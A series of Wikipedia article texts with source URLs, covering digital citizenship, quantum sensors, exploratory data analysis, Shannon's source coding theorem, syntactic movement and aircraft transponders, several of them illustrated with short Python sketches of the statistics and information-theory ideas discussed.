The FTC does play a significant role in protecting the digital citizen. However, individuals' public records are increasingly useful to the government and highly sought after. This material can help the government detect a variety of crimes such as fraud, drug distribution rings, and terrorist cells, and it makes it easier to properly profile a suspected criminal and keep an eye on them. Although there are a variety of ways to gather information on an individual through credit card history, employment history, and more, the internet is becoming the most desirable information gatherer thanks to its façade of security and the amount of information that can be stored on the internet. Anonymity has proven to be very rare online as ISPs can keep track of an individual's activity online.[37]
Digital citizenship is a term used to define the appropriate and responsible use of technology among users. Three principles were developed by Mike Ribble to teach digital users how to responsibly use technology to become digital citizens: respect, educate, and protect.[38] Each principle contains three of the nine elements of digital citizenship.[39]
Within these three core principles, there are nine elements to also be considered in regards to digital citizenship:[39]
According to Mike Ribble, an author who has worked on the topic of digital citizenship for more than a decade, digital access is the first element that is prevalent in today's educational curriculum. He cited a widening gap between the impoverished and the wealthy, as 41% of African American and Hispanic students use computers in the home, compared to 77% of white students. Other crucial digital elements include commerce, communication, literacy, and etiquette. He also emphasized that educators must understand that technology is important for all students, not only those who already have access to it, in order to decrease the digital divide that currently exists.[10]
Furthermore, in research brought up by Common Sense Media, approximately six out of ten American K-12 teachers used some type of digital citizenship curriculum, and seven out of ten taught some sort of competency skill utilizing digital citizenship.[41] Many of the topics these teachers focused on included hate speech, cyberbullying, and digital drama. A problem with digital technology that still exists is that over 35% of students were observed to lack the skills to critically evaluate information online, and these issues and statistics increased as the grade levels rose. Online videos such as those found on YouTube and Netflix have been used by approximately 60% of K-12 teachers in classrooms, while educational tools such as Microsoft Office and Google G Suite have been used by around half of the teachers. Social media was used the least, at around 13%, in comparison to other digital methods of education.[42] When analyzing social class differences between schools, it was found that teachers at Title I schools were more likely to use digital citizenship curricula than teachers at more affluent schools.
In the past two years,[when?] there has been a major shift to move students from digital citizenship to digital leadership in order to make a greater impact on online interactions. Though digital citizens take a responsible approach to acting ethically, digital leadership is a more proactive approach, encompassing the "use of internet and social media to improve the lives, well-being, and circumstances of others" as part of one's daily life.[43] In February 2018, after the Valentine's Day shooting in Parkland, Florida, students became dynamic digital citizens, using social media and other web platforms to engage proactively on the issue and push back against cyberbullies and misinformation. Students from Marjory Stoneman Douglas High School specifically rallied against gun violence, live-tweeting, texting, videoing, and recording the attack as it happened, using on-site digital tools not only to witness what was happening at the time but to allow the world to witness it as well. This allowed the nation to see and react, and as a result, students built a web page and logo for their new movement.[44] They gave interviews to major media outlets, spoke at rallies and protests, engaged elected officials at meetings and town halls, and coordinated a nationwide march online for March 24.[45] The idea of this shift in youth is to express empathy beyond one's self, moving to seeing one's self in the digital company of others.
Nonetheless, several critics note that just as empathy can be spread to a vast number of individuals, hatred can be spread as well. Though the United Nations and other groups have been establishing fronts against hate speech, there is no legal definition of hate speech used internationally, and more research needs to be done on its impact.[46]
Along with educational trends, there are overlapping goals of digital citizenship education. Altogether, these facets contribute to one another in the development of a healthy and effective education for digital technology and communication.[47]
There are free and opencurriculadeveloped by different organizations for teaching Digital Citizenship skills in schools:
https://en.wikipedia.org/wiki/Digital_citizen
Within quantum technology, a quantum sensor utilizes properties of quantum mechanics, such as quantum entanglement, quantum interference, and quantum state squeezing, to optimize precision and beat current limits in sensor technology.[1] The field of quantum sensing deals with the design and engineering of quantum sources (e.g., entangled) and quantum measurements that are able to beat the performance of any classical strategy in a number of technological applications.[2] This can be done with photonic systems[3] or solid state systems.[4]
In photonics and quantum optics, photonic quantum sensing leverages entanglement, single photons and squeezed states to perform extremely precise measurements. Optical sensing makes use of continuous-variable quantum systems such as different degrees of freedom of the electromagnetic field, vibrational modes of solids, and Bose–Einstein condensates.[5] These quantum systems can be probed to characterize an unknown transformation between two quantum states. Several methods are in place to improve photonic sensors' quantum illumination of targets, which has been used to improve detection of weak signals through the use of quantum correlation.[6][7][8][9][10]
Quantum sensors are often built on continuous-variable systems, i.e., quantum systems characterized by continuous degrees of freedom such as the position and momentum quadratures. The basic working mechanism typically relies on optical states of light, often involving quantum mechanical properties such as squeezing or two-mode entanglement.[3] These states are sensitive to physical transformations that are detected by interferometric measurements.[5]
Quantum sensing can also be utilized in non-photonic areas such as spin qubits, trapped ions, flux qubits,[4] and nanoparticles.[11] These systems can be compared by the physical characteristics to which they respond; for example, trapped ions respond to electrical fields while spin systems respond to magnetic fields.[4] Trapped ions are useful because their quantized motional levels couple strongly to the electric field. They have been proposed for studying electric field noise above surfaces,[12] and, more recently, as rotation sensors.[13]
In solid-state physics, a quantum sensor is a quantum device that responds to a stimulus. Usually this refers to a sensor that has quantized energy levels, or that uses quantum coherence or entanglement to improve measurements beyond what can be done with classical sensors.[4] There are four criteria for solid-state quantum sensors:[4]
Quantum sensors have applications in a wide variety of fields, including microscopy, positioning systems, communication technology, electric and magnetic field sensors, and geophysical areas of research such as mineral prospecting and seismology.[4] Many measurement devices utilize quantum properties in order to probe measurements, such as atomic clocks, superconducting quantum interference devices, and nuclear magnetic resonance spectroscopy.[4][14] With new technological advancements, individual quantum systems can be used as measurement devices, utilizing entanglement, superposition, interference and squeezing to enhance sensitivity and surpass the performance of classical strategies.
A good example of an early quantum sensor is an avalanche photodiode (APD). APDs have been used to detect entangled photons. With additional cooling and sensor improvements, they can be used where photomultiplier tubes (PMTs) were previously used, in fields such as medical imaging. APDs, in the form of 2-D and even 3-D stacked arrays, can be used as a direct replacement for conventional sensors based on silicon diodes.[15]
The Defense Advanced Research Projects Agency (DARPA) launched a research program in optical quantum sensors that seeks to exploit ideas from quantum metrology and quantum imaging, such as quantum lithography and the NOON state,[16] in order to achieve these goals with optical sensor systems such as lidar.[6][17][18][19] The United States judges quantum sensing to be the most mature of quantum technologies for military use, theoretically replacing GPS in areas without coverage, or possibly acting with ISR capabilities or detecting submarine or subterranean structures or vehicles, as well as nuclear material.[20]
For photonic systems, current areas of research consider feedback and adaptive protocols. This is an active area of research in discrimination and estimation of bosonic loss.[21]
Injecting squeezed light into interferometers allows for higher sensitivity to weak signals that could not be detected classically.[1] A practical application of quantum sensing is realized in gravitational wave sensing.[22] Gravitational wave detectors, such as LIGO, utilize squeezed light to measure signals below the standard quantum limit.[23] Squeezed light has also been used to detect signals below the standard quantum limit in plasmonic sensors and atomic force microscopy.[24]
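To give a sense of the scales involved, the shot-noise-limited phase uncertainty of an interferometer scales as 1/√N for N photons, and in the idealized lossless case injecting squeezed light lowers that floor by a factor 10^(−dB/20) (e^(−r) for squeezing parameter r). This is a minimal numerical sketch of those scalings, not a model of any particular detector; the function names and parameters are illustrative:

```python
import math

def phase_uncertainty_sql(n_photons):
    """Shot-noise (standard quantum limit) phase uncertainty: 1 / sqrt(N)."""
    return 1.0 / math.sqrt(n_photons)

def phase_uncertainty_squeezed(n_photons, squeeze_db):
    """Idealized squeezed-light sensitivity: the shot-noise floor is reduced
    by a factor 10**(-dB/20), i.e. e**(-r) for squeezing parameter r."""
    return phase_uncertainty_sql(n_photons) * 10 ** (-squeeze_db / 20)

n = 1e6                                              # photons per measurement
sql = phase_uncertainty_sql(n)                       # 1e-3 rad
with_squeezing = phase_uncertainty_squeezed(n, 10)   # ~3.2e-4 rad at 10 dB
```

With 10 dB of squeezing the uncertainty drops by roughly a factor of three, the same gain that would otherwise require about ten times more optical power at the shot-noise limit.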
Quantum sensing also has the capability to overcome resolution limits, where current issues of vanishing distinguishability between two close frequencies can be overcome by making the projection noise vanish.[25][26] Diminishing projection noise has direct applications in communication protocols and nanoscale nuclear magnetic resonance.[27][28]
Entanglement can be used to improve upon existing atomic clocks[29][30][31] or create more sensitive magnetometers.[32][33]
Quantum radar is also an active area of research. Current classical radars can interrogate many target bins, while quantum radars are limited to a single polarization or range.[34] A proof-of-concept quantum radar, or quantum illuminator, using quantum-entangled microwaves was able to detect low-reflectivity objects at room temperature; such systems may be useful for improved radar systems, security scanners and medical imaging systems.[35][36][37]
In neuroimaging, the first quantum brain scanner uses magnetic imaging and could become a novel whole-brain scanning approach.[38][39]
Quantum gravity gradiometers that could be used to map and investigate subterranean features are also in development.[40][41]
https://en.wikipedia.org/wiki/Quantum_sensor
In statistics, exploratory data analysis (EDA) is an approach to analyzing data sets to summarize their main characteristics, often using statistical graphics and other data visualization methods. A statistical model can be used or not, but primarily EDA is for seeing what the data can tell us beyond the formal modeling; it thereby contrasts with traditional hypothesis testing, in which a model is supposed to be selected before the data is seen. Exploratory data analysis has been promoted by John Tukey since 1970 to encourage statisticians to explore the data, and possibly formulate hypotheses that could lead to new data collection and experiments. EDA is different from initial data analysis (IDA),[1][2] which focuses more narrowly on checking assumptions required for model fitting and hypothesis testing, and on handling missing values and making transformations of variables as needed. EDA encompasses IDA.
Tukey defined data analysis in 1961 as: "Procedures for analyzing data, techniques for interpreting the results of such procedures, ways of planning the gathering of data to make its analysis easier, more precise or more accurate, and all the machinery and results of (mathematical) statistics which apply to analyzing data."[3]
Exploratory data analysis is a technique for analyzing and investigating a data set and summarizing its main characteristics. A main advantage of EDA is that it provides a visualization of the data after analysis has been conducted.
Tukey's championing of EDA encouraged the development of statistical computing packages, especially S at Bell Labs.[4] The S programming language inspired the systems S-PLUS and R. This family of statistical-computing environments featured vastly improved dynamic visualization capabilities, which allowed statisticians to identify outliers, trends and patterns in data that merited further study.
Tukey's EDA was related to two other developments in statistical theory: robust statistics and nonparametric statistics, both of which tried to reduce the sensitivity of statistical inferences to errors in formulating statistical models. Tukey promoted the use of the five-number summary of numerical data: the two extremes (maximum and minimum), the median, and the quartiles. The median and quartiles, being functions of the empirical distribution, are defined for all distributions, unlike the mean and standard deviation; moreover, the quartiles and median are more robust to skewed or heavy-tailed distributions than those traditional summaries. The packages S, S-PLUS, and R included routines using resampling statistics, such as Quenouille and Tukey's jackknife and Efron's bootstrap, which are nonparametric and robust (for many problems).
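The five-number summary is straightforward to compute; a minimal sketch in Python's standard library (note that quartile conventions vary between implementations, and `statistics.quantiles` defaults to the "exclusive" method):

```python
import statistics

def five_number_summary(data):
    """Return (minimum, Q1, median, Q3, maximum) for a numeric sample.

    Quartile conventions differ between libraries; this uses the stdlib's
    default 'exclusive' method in statistics.quantiles.
    """
    values = sorted(data)
    q1, median, q3 = statistics.quantiles(values, n=4)
    return (values[0], q1, median, q3, values[-1])

print(five_number_summary(range(1, 12)))  # (1, 3.0, 6.0, 9.0, 11)
```

Because every entry is an order statistic (or an interpolation between two of them), the summary is defined for any distribution and is insensitive to extreme values in a way the mean and standard deviation are not.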
Exploratory data analysis, robust statistics, nonparametric statistics, and the development of statistical programming languages facilitated statisticians' work on scientific and engineering problems. Such problems included the fabrication of semiconductors and the understanding of communications networks, both of which were of interest to Bell Labs. These statistical developments, all championed by Tukey, were designed to complement the analytic theory of testing statistical hypotheses, particularly the Laplacian tradition's emphasis on exponential families.[5]
John W. Tukey wrote the book Exploratory Data Analysis in 1977.[6] Tukey held that too much emphasis in statistics was placed on statistical hypothesis testing (confirmatory data analysis); more emphasis needed to be placed on using data to suggest hypotheses to test. In particular, he held that confusing the two types of analyses and employing them on the same set of data can lead to systematic bias owing to the issues inherent in testing hypotheses suggested by the data.
The objectives of EDA are to:
Many EDA techniques have been adopted into data mining. They are also being taught to young students as a way to introduce them to statistical thinking.[8]
There are a number of tools that are useful for EDA, but EDA is characterized more by the attitude taken than by particular techniques.[9]
Typical graphical techniques used in EDA are:
Dimensionality reduction:
Typical quantitative techniques are:
Many EDA ideas can be traced back to earlier authors, for example:
The Open University course Statistics in Society (MDST 242) took the above ideas and merged them with Gottfried Noether's work, which introduced statistical inference via coin-tossing and the median test.
Findings from EDA are orthogonal to the primary analysis task. To illustrate, consider an example from Cook et al. where the analysis task is to find the variables which best predict the tip that a dining party will give to the waiter.[12] The variables available in the data collected for this task are: the tip amount, total bill, payer gender, smoking/non-smoking section, time of day, day of the week, and size of the party. The primary analysis task is approached by fitting a regression model where the tip rate is the response variable. The fitted model is

tip rate = 0.18 − 0.01 × party size
which says that as the size of the dining party increases by one person (leading to a higher bill), the tip rate will decrease by 1%, on average.
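A fit of this kind can be reproduced with ordinary least squares; the following is a minimal sketch with made-up data, where the slope of −0.01 matches the 1%-per-person decrease described above and the intercept of 0.18 is purely illustrative (the data values are not from Cook et al.):

```python
def simple_ols(x, y):
    """Closed-form ordinary least squares fit of y = intercept + slope * x."""
    n = len(x)
    mean_x = sum(x) / n
    mean_y = sum(y) / n
    sxy = sum((xi - mean_x) * (yi - mean_y) for xi, yi in zip(x, y))
    sxx = sum((xi - mean_x) ** 2 for xi in x)
    slope = sxy / sxx
    intercept = mean_y - slope * mean_x
    return intercept, slope

# Hypothetical data generated exactly from tip_rate = 0.18 - 0.01 * size,
# so the fit recovers those coefficients.
party_size = [1, 2, 3, 4, 5, 6]
tip_rate = [0.18 - 0.01 * s for s in party_size]
intercept, slope = simple_ols(party_size, tip_rate)
```

The point of the EDA example, of course, is that a single fitted line like this hides structure that only plots reveal.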
However, exploring the data reveals other interesting features not described by this model.
What is learned from the plots is different from what is illustrated by the regression model, even though the experiment was not designed to investigate any of these other trends. The patterns found by exploring the data suggest hypotheses about tipping that may not have been anticipated in advance, and which could lead to interesting follow-up experiments where the hypotheses are formally stated and tested by collecting new data.
https://en.wikipedia.org/wiki/Exploratory_data_analysis
In information theory, Shannon's source coding theorem (or noiseless coding theorem) establishes the statistical limits to possible data compression for data whose source is an independent identically-distributed random variable, and the operational meaning of the Shannon entropy.
Named after Claude Shannon, the source coding theorem shows that, in the limit, as the length of a stream of independent and identically-distributed random variable (i.i.d.) data tends to infinity, it is impossible to compress such data such that the code rate (average number of bits per symbol) is less than the Shannon entropy of the source, without it being virtually certain that information will be lost. However, it is possible to get the code rate arbitrarily close to the Shannon entropy, with negligible probability of loss.
The source coding theorem for symbol codes places an upper and a lower bound on the minimal possible expected length of codewords as a function of the entropy of the input word (which is viewed as a random variable) and of the size of the target alphabet.
Note that, for data that exhibits more dependencies (whose source is not an i.i.d. random variable), the Kolmogorov complexity, which quantifies the minimal description length of an object, is more suitable for describing the limits of data compression. Shannon entropy takes into account only frequency regularities while Kolmogorov complexity takes into account all algorithmic regularities, so in general the latter is smaller. On the other hand, if an object is generated by a random process in such a way that it has only frequency regularities, entropy is close to complexity with high probability (Shen et al. 2017).[1]
Source coding is a mapping from (a sequence of) symbols from an information source to a sequence of alphabet symbols (usually bits) such that the source symbols can be exactly recovered from the binary bits (lossless source coding) or recovered within some distortion (lossy source coding). This is one approach to data compression.
In information theory, the source coding theorem (Shannon 1948)[2] informally states that (MacKay 2003, p. 81,[3] Cover 2006, Chapter 5[4]):
N i.i.d. random variables each with entropy H(X) can be compressed into more than N H(X) bits with negligible risk of information loss, as N → ∞; but conversely, if they are compressed into fewer than N H(X) bits it is virtually certain that information will be lost.
The N H(X) coded sequence represents the compressed message in a biunivocal (one-to-one) way, under the assumption that the decoder knows the source. From a practical point of view, this hypothesis is not always true. Consequently, when the entropy encoding is applied the transmitted message is N H(X) + (source information). Usually, the information that characterizes the source is inserted at the beginning of the transmitted message.
Let Σ1, Σ2 denote two finite alphabets and let Σ1∗ and Σ2∗ denote the set of all finite words from those alphabets (respectively).
Suppose that X is a random variable taking values in Σ1 and let f be a uniquely decodable code from Σ1∗ to Σ2∗ where |Σ2| = a. Let S denote the random variable given by the length of codeword f(X).
If f is optimal in the sense that it has the minimal expected word length for X, then (Shannon 1948):

H(X)/log2 a ≤ E[S] < H(X)/log2 a + 1
where E denotes the expected value operator.
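These bounds can be checked numerically: a Huffman code is optimal among prefix codes, so its expected length must fall between H(X) and H(X) + 1 for a binary target alphabet (a = 2). A minimal sketch (the length-tracking construction below is a standard textbook variant, not a specific library API):

```python
import heapq
import itertools
import math

def huffman_lengths(probs):
    """Codeword lengths of a binary Huffman code for the given distribution."""
    counter = itertools.count()  # tie-breaker so the heap never compares lists
    heap = [(p, next(counter), [i]) for i, p in enumerate(probs)]
    heapq.heapify(heap)
    lengths = [0] * len(probs)
    while len(heap) > 1:
        p1, _, syms1 = heapq.heappop(heap)
        p2, _, syms2 = heapq.heappop(heap)
        for i in syms1 + syms2:  # each merge adds one bit to these codewords
            lengths[i] += 1
        heapq.heappush(heap, (p1 + p2, next(counter), syms1 + syms2))
    return lengths

probs = [0.5, 0.25, 0.125, 0.125]
entropy = -sum(p * math.log2(p) for p in probs)  # H(X) = 1.75 bits
expected_len = sum(p * l for p, l in zip(probs, huffman_lengths(probs)))
```

For this dyadic distribution the code lengths are exactly −log2 p, so E[S] equals H(X) = 1.75 bits; for non-dyadic distributions E[S] lands strictly inside the interval [H(X), H(X) + 1).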
Given X is an i.i.d. source, its time series X1, ..., Xn is i.i.d. with entropy H(X) in the discrete-valued case and differential entropy in the continuous-valued case. The source coding theorem states that for any ε > 0, i.e. for any rate H(X) + ε larger than the entropy of the source, there is a large enough n and an encoder that takes n i.i.d. repetitions of the source, X1:n, and maps them to n(H(X) + ε) binary bits such that the source symbols X1:n are recoverable from the binary bits with probability of at least 1 − ε.
Proof of achievability. Fix some ε > 0, and let

p(x1, ..., xn) = Pr[X1 = x1, ..., Xn = xn].
The typical set, A_n^ε, is defined as follows:

A_n^ε = { (x1, ..., xn) : |−(1/n) log2 p(x1, ..., xn) − H(X)| < ε }.
The asymptotic equipartition property (AEP) shows that for large enough n, the probability that a sequence generated by the source lies in the typical set, A_n^ε, as defined approaches one. In particular, for sufficiently large n, P((X1, X2, ..., Xn) ∈ A_n^ε) can be made arbitrarily close to 1, and specifically, greater than 1 − ε (see AEP for a proof).
The definition of typical sets implies that those sequences that lie in the typical set satisfy:

2^(−n(H(X)+ε)) ≤ p(x1, ..., xn) ≤ 2^(−n(H(X)−ε)).
Since |A_n^ε| ≤ 2^(n(H(X)+ε)), n(H(X)+ε) bits are enough to point to any string in this set.
The encoding algorithm: the encoder checks if the input sequence lies within the typical set; if yes, it outputs the index of the input sequence within the typical set; if not, the encoder outputs an arbitrary n(H(X) + ε)-digit number. As long as the input sequence lies within the typical set (with probability at least 1 − ε), the encoder does not make any error. So, the probability of error of the encoder is bounded above by ε.
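This encoder can be made concrete for a small Bernoulli source; the following is a minimal sketch (the parameters p, n and ε are chosen purely for illustration) that enumerates the typical set and checks the cardinality bound |A_n^ε| ≤ 2^(n(H(X)+ε)):

```python
import itertools
import math

p, n, eps = 0.2, 12, 0.2  # Bernoulli(p) source, block length n, tolerance eps
entropy = -(p * math.log2(p) + (1 - p) * math.log2(1 - p))  # H(X) ~ 0.722 bits

def log2_prob(seq):
    """log2 of the probability of a 0/1 sequence under Bernoulli(p)."""
    ones = sum(seq)
    return ones * math.log2(p) + (len(seq) - ones) * math.log2(1 - p)

# The typical set: sequences whose per-symbol log-probability is within
# eps of the source entropy.
typical = [seq for seq in itertools.product((0, 1), repeat=n)
           if abs(-log2_prob(seq) / n - entropy) < eps]

mass = sum(2 ** log2_prob(seq) for seq in typical)  # probability of the typical set
assert len(typical) <= 2 ** (n * (entropy + eps))   # cardinality bound from the theorem
```

At this very small block length the typical set already carries roughly half of the total probability mass while containing only a tiny fraction of the 2^n sequences; as n grows, the AEP drives that mass toward 1, which is what makes the index-based encoder work.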
Proof of converse: the converse is proved by showing that any set of size smaller than A_n^ε (in the sense of exponent) would cover a set of probability bounded away from 1.
For 1 ≤ i ≤ n let si denote the word length of each possible xi. Define qi = a^(−si)/C, where C is chosen so that q1 + ... + qn = 1. Then

H(X) = −∑i pi log2 pi
     ≤ −∑i pi log2 qi
     = −∑i pi log2 a^(−si) + ∑i pi log2 C
     = −∑i pi log2 a^(−si) + log2 C
     ≤ −∑i pi (−si) log2 a
     = E[S] log2 a
where the second line follows from Gibbs' inequality and the fifth line follows from Kraft's inequality:

C = ∑i a^(−si) ≤ 1
so log C ≤ 0.
For the second inequality we may set

si = ⌈−log_a pi⌉
so that

−log_a pi ≤ si < −log_a pi + 1
and so

a^(−si) ≤ pi
and

∑i a^(−si) ≤ ∑i pi = 1
and so by Kraft's inequality there exists a prefix-free code having those word lengths. Thus the minimal S satisfies

E[S] = ∑i pi si < ∑i pi (−log_a pi + 1) = H(X)/log2 a + 1.
Define the typical set A_n^ε as:

A_n^ε = { x1^n : |−(1/n) log p(X1, ..., Xn) − H̄n(X)| < ε }.
Then, for given δ > 0, for n large enough, Pr(A_n^ε) > 1 − δ. Now we just encode the sequences in the typical set, and the usual methods in source coding show that the cardinality of this set is smaller than 2^(n(H̄n(X)+ε)). Thus, on average, H̄n(X) + ε bits suffice for encoding with probability greater than 1 − δ, where ε and δ can be made arbitrarily small by making n larger.
https://en.wikipedia.org/wiki/Shannon%27s_source_coding_theorem
Syntactic movement is the means by which some theories of syntax address discontinuities. Movement was first postulated by structuralist linguists who expressed it in terms of discontinuous constituents or displacement.[1] Some constituents appear to have been displaced from the position in which they receive important features of interpretation.[2] The concept of movement is controversial and is associated with so-called transformational or derivational theories of syntax (such as transformational grammar, government and binding theory, and the minimalist program). Representational theories (such as head-driven phrase structure grammar, lexical functional grammar, construction grammar, and most dependency grammars), in contrast, reject the notion of movement and often instead address discontinuities with other mechanisms, including graph reentrancies, feature passing, and type shifters.
Movement is the traditional means of explaining discontinuities such as wh-fronting, topicalization, extraposition, scrambling, inversion, and shifting:[3]
The a-sentences show canonical word order, and the b-sentences illustrate the discontinuities that movement seeks to explain. Bold script marks the expression that is moved, and underscores mark the positions from which movement is assumed to have occurred. In the first a-sentence, the constituent "the first story" serves as the object of the verb "likes" and appears in its canonical position immediately following that verb. In the first b-sentence, the constituent "which story" likewise serves as the object of the verb, but appears at the beginning of the sentence rather than in its canonical position following the verb. Movement-based analyses explain this fact by positing that the constituent is base-generated in its canonical position but is moved to the beginning of the sentence, in this case because of a question-forming operation.
The examples above use an underscore to mark the position from which movement is assumed to have occurred. In formal theories of movement, these underscores correspond to actual syntactic objects, either traces or copies depending on one's particular theory,[4] e.g.
Subscripts help indicate the constituent that is assumed to have left a trace in its former position, the position marked by t.[5] The other means of indicating movement is in terms of copies. Movement is then taken to be a process of copying the same constituent in different positions and deleting the phonological features of all but one copy.[6] Italics are used in the following example to indicate a copy that lacks phonological representation:
There are various nuances associated with each of the means of indicating movement (blanks, traces, copies), but for the most part, each convention has the same goal of indicating the presence of a discontinuity.
Within generative grammar, various types of movement have been distinguished. An important distinction is the one between head movement and phrasal movement, with the latter type being further subdivided into A-movement and A-bar movement. Copy movement is another more general type of movement.
Argument movement (A-movement) displaces a phrase into a position in which a fixed grammatical function is assigned, such as the movement of the object to the subject position in passives:[7]
Non-argument movement (A-bar movement or A'-movement), in contrast, displaces a phrase into a position where a fixed grammatical function is not assigned, such as the movement of a subject or object NP to a pre-verbal position in interrogatives:
The A- vs. A-bar distinction is a reference to the theoretical status of syntax with respect to the lexicon. The distinction elevates the role of syntax by locating the theory of voice (active vs. passive) almost entirely in syntax (as opposed to in the lexicon). A theory of syntax that locates the active-passive distinction in the lexicon (the passive is not derived via transformations from the active) rejects the distinction entirely.
A different partition among types of movement is phrasal vs. head movement.[8] Phrasal movement occurs when the head of a phrase moves together with all its dependents in such a manner that the entire phrase moves. Most of the examples above involve phrasal movement. Head movement, in contrast, occurs when just the head of a phrase moves, leaving behind its dependents. Subject-auxiliary inversion is a canonical instance of head movement:
On the assumption that the auxiliaries "has" and "will" are the heads of phrases, such as of IPs (inflection phrases), the b-sentences are the result of head movement: the auxiliary verbs "has" and "will" move leftward without taking with them the rest of the phrase that they head.
The distinction between phrasal movement and head movement relies crucially on the assumption that movement is occurring leftward. An analysis of subject-auxiliary inversion that acknowledges rightward movement can dispense with head movement entirely:
The analysis shown in those sentences views the subject pronouns "someone" and "she" as moving rightward, instead of the auxiliary verbs moving leftward. Since the pronouns lack dependents (they alone qualify as complete phrases), there would be no reason to assume head movement.
Since it was first proposed, the theory of syntactic movement has yielded a new field of research aiming to provide the filters that block certain types of movement. Called locality theory,[9] it is interested in discerning the islands and barriers to movement. It strives to identify the categories and constellations that block movement from occurring; in other words, it strives to explain the failure of certain attempts at movement:
All of the b-sentences are disallowed because of locality constraints on movement. Adjuncts and subjects are islands that block movement, and left branches in NPs are barriers that prevent pre-noun modifiers from being extracted out of NPs.
Syntactic movement is controversial, especially in light of movement paradoxes. Theories of syntax that posit feature passing reject syntactic movement outright; that is, they reject the notion that a given "moved" constituent ever appears in its "base" position below the surface, in the positions marked by blanks, traces, or copies. Instead, they assume that there is but one level of syntax, and all constituents appear only in their surface positions, with no underlying level or derivation. To address discontinuities, they posit that the features of a displaced constituent are passed up and/or down the syntactic hierarchy between that constituent and its governor.[10] The following tree illustrates the feature-passing analysis of a wh-discontinuity in a dependency grammar.[11]
The words in red mark the catena (chain of words) that connects the displaced wh-constituent "what" to its governor "eat", the word that licenses its appearance.[12] The assumption is that features (= information) associated with "what" (e.g. noun, direct object) are passed up and down along the catena marked in red. In that manner, the ability of "eat" to subcategorize for a direct object NP is acknowledged. By examining the nature of catenae like the one in red, the locality constraints on discontinuities can be identified.
In government and binding theory and some of its descendant theories, movement leaves behind an empty category called a trace.
In such theories, traces are considered real parts of syntactic structure, detectable in secondary effects they have on the syntax. For instance, one empirical argument for their existence comes from the English phenomenon of wanna contraction, in which "want to" contracts into "wanna". This phenomenon has been argued to be impossible when a trace would intervene between "want" and "to", as in the b-sentence below.[13]
Evidence of this sort has not led to a full consensus in favor of traces, since other kinds of contraction permit an intervening putative trace.[14]
Proponents of the trace theory have responded to these counterarguments in various ways. For instance, Bresnan (1971) argued that contractions of "to" are enclitic while contractions of tensed auxiliaries are proclitic, meaning that only the former would be affected by a preceding trace.[15]
https://en.wikipedia.org/wiki/Trace_(linguistics)
A transponder (short for transmitter-responder[1] and sometimes abbreviated to XPDR,[2] XPNDR,[3] TPDR[4] or TP[5]) is an electronic device that produces a response when it receives a radio-frequency interrogation. Aircraft have transponders to assist in identifying them on air traffic control radar. Collision avoidance systems have been developed to use transponder transmissions as a means of detecting aircraft at risk of colliding with each other.[6][7]
Air traffic control (ATC) units use the term "squawk" when they are assigning an aircraft a transponder code, e.g., "Squawk 7421". Squawk thus can be said to mean "select transponder code", and "squawking xxxx" to mean "I have selected transponder code xxxx".[6]
The transponder receives interrogation from the secondary surveillance radar on 1030 MHz and replies on 1090 MHz.
Secondary surveillance radar (SSR) is referred to as "secondary" to distinguish it from the "primary radar" that works by reflecting a radio signal off the skin of the aircraft. Primary radar determines range and bearing to a target with reasonably high fidelity, but it cannot determine target elevation (altitude) reliably except at close range. SSR uses an active transponder (beacon) to transmit a response to an interrogation by a secondary radar. This response most often includes the aircraft's pressure altitude and a 4-digit octal identifier.[7][8]
A pilot may be requested to squawk a given code by an air traffic controller, via the radio, using a phrase such as "Cessna 123AB, squawk 0363". The pilot then selects the 0363 code on their transponder and the track on the air traffic controller's radar screen will become correctly associated with their identity.[6][7]
Because primary radar generally gives bearing and range position information, but lacks altitude information, mode C and mode S transponders also report pressure altitude. Mode C altitude information conventionally comes from the pilot's altimeter, and is transmitted using a modified Gray code, called a Gillham code. Where the pilot's altimeter does not contain a suitable altitude encoder, a blind encoder (which does not directly display altitude) is connected to the transponder. Around busy airspace there is often a regulatory requirement that all aircraft be equipped with altitude-reporting mode C or mode S transponders. In the United States, this is known as a Mode C veil. Mode S transponders are compatible with transmitting the mode C signal, and have the capability to report in 25-foot (7.5 m) increments; they receive information from a GPS receiver and also transmit location and speed. Without pressure altitude reporting, the air traffic controller has no display of accurate altitude information, and must rely on the altitude reported by the pilot via radio.[6][7] Similarly, the traffic collision avoidance system (TCAS) installed on some aircraft needs the altitude information supplied by transponder signals.
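The altitude encoding above relies on a Gray-type code, in which successive values differ in exactly one bit, so a single misread bit corresponds to only one altitude increment. As a hedged illustration (the real Gillham code uses a specific bit assignment not reproduced here), the standard binary-reflected Gray code conversion can be sketched as:

```python
def to_gray(n: int) -> int:
    """Convert a binary number to its reflected Gray code."""
    return n ^ (n >> 1)

def from_gray(g: int) -> int:
    """Recover the binary value from a reflected Gray code."""
    n = 0
    while g:
        n ^= g
        g >>= 1
    return n
```

Successive inputs always yield codes differing in a single bit, which is the property that makes Gray-type codes robust for altitude reporting.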
All mode A, C, and S transponders include an "IDENT" switch which activates a special thirteenth bit on the mode A reply known as IDENT, short for "identify". When ground-based radar equipment[9]receives the IDENT bit, it results in the aircraft's blip "blossoming" on the radar scope. This is often used by the controller to locate the aircraft amongst others by requesting the ident function from the pilot, e.g., "Cessna 123AB, squawk 0363 and ident".[6][7]
Ident can also be used in case of a reported or suspected radio failure to determine if the failure is only one way and whether the pilot can still transmit or receive, but not both, e.g., "Cessna 123AB, if you read, squawk ident".[7]
Transponder codes are four-digit numbers transmitted by an aircraft transponder in response to a secondary surveillance radar interrogation signal to assist air traffic controllers with traffic separation. A discrete transponder code (often called a squawk code) is assigned by air traffic controllers to identify an aircraft uniquely in a flight information region (FIR). This allows easy identification of aircraft on radar.[6][7]
Codes are made of four octal digits; the dials on a transponder read from zero to seven, inclusive. Four octal digits can represent up to 4096 different codes, which is why such transponders are sometimes described as "4096 code transponders".[10]
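The "4096 code" figure follows directly from the four octal dials: 8^4 = 4096. A minimal sketch of the arithmetic (the helper name `squawk_to_bits` is hypothetical, introduced only for illustration):

```python
def squawk_to_bits(code: str) -> int:
    """Pack a four-digit octal squawk code into the 12-bit value it represents
    (3 bits per dial, most significant dial first)."""
    if len(code) != 4 or any(d not in "01234567" for d in code):
        raise ValueError("squawk codes use four octal digits 0-7")
    return int(code, 8)

# Four dials with eight positions each give 8**4 == 4096 distinct codes,
# exactly the values 0..4095 expressible in 12 bits.
```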
The use of the word "squawk" comes from the system's origin in the World War II identification friend or foe (IFF) system, which was code-named "Parrot".[11][12]
Some codes can be selected by the pilot if and when the situation requires or allows it, without permission from ATC. Such codes are referred to as "conspicuity codes" in the UK.[13] Other codes are generally assigned by ATC units.[6][7] For flights on instrument flight rules (IFR), the squawk code is typically assigned as part of the departure clearance and stays the same throughout the flight.[6][7]
